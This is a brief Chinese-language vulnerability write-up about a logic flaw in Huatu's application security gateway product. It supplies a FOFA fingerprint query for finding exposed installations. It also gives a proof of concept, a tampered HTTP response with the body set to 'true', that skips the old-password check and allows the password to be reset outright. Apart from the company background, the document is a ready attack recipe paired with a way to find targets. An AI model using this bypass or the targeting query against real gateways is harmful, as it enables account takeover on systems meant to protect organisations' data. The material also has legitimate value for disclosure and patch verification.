漏洞描述
浙江华途信息安全技术股份有限公司(简称:华途信息)成立于2007年,是中国领先的数据安全产品与服务提供商,立志成为全球领先的数据安全企业。华途信息总部位于中国杭州,在北京、上海、广州、深圳、成都、武汉、苏州、济南、沈阳等十多个区域设有分支机构。华途 应用安全网关存在逻辑缺陷漏洞
FOFA语法:body="应用安全网关 - Powered By asg"
漏洞复现
这里的旧密码验证的时候有逻辑缺陷,只需将返回包改成true即可绕过验证
POC:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Aug 2024 02:20:05 GMT
Content-Length: 5
true
绕过旧密码验证之后即可直接设置密码